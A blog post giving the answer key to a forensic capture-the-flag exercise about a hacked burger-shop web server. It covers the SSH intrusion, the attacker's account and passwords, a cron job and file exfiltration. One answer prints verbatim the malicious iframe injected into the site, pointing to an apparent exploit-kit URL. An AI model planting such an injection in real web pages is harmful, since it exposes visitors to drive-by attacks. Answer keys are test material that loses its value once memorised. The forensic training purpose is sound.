Sunday, March 19, 2017

Answers: Forensic CTF - Bob's Chili Burgers Website Hacked

Emma V writes:
Hey, will you post the answers ?

Answer: Yes! Sorry I hadn't posted them previously. Glad you worked the case, hope you had fun. Let me know if there's any interest on a walkthrough for this one, I'd be happy to put one together.

  1. Verify SHA1 Checksum of the image provided: c67d36f2a8851fdf9bb3de9fd0441b619e40c070
  2. Through what protocol was this system compromised? SSH
  3. What distribution and version is this system? Ubuntu 14.04.4 LTS
  4. What country is the attacker's IP address from? Russia
  5. What time was the attacker account created in UTC (XX:XX:XX format)? Jun 1 20:11:03
  6. What port is the protocol used to compromise the system set on? 422
  7. How many different countries are represented by the IP's in the web server log? 6
  8. What date and time (directly copy/paste from log) did the attacker first log in? Jun 1 20:03:45
  9. What is the IP that failed to log in directly before the attacker successfully logged in? 107.150.94.4
  10. What day of the week does the attacker's cron job fire? Monday
  11. What is the name of the user account the attacker made? radvlad
  12. The attacker set a password for the account that they made, what is it set to? 1qaz2wsx
  13. The attacker changed the root password, what is it set to? asdzxc
  14. What addition to the website is causing users to get redirected to malicious pages? <iframe src="http://anecdote.roobaroo.org/xegblh2.html"></iframe>
  15. What exploit kit is the link associated with? Angler
  16. What is the sha256 hash of the first file the attacker added to /var/www/html? 94ebd2af4d1e1e4d01c4806cf1d94c44d24014da0703424f864e5e8cd3396fb9
  17. What is the ClamAV name for the second file the attacker added to /var/www/html? Win.Trojan.691128-1
  18. What file was exfiltrated? Secret-Recipe-Chili
  19. What command line tool did the attacker use to exfiltrate the file? pastebinit

3 comments: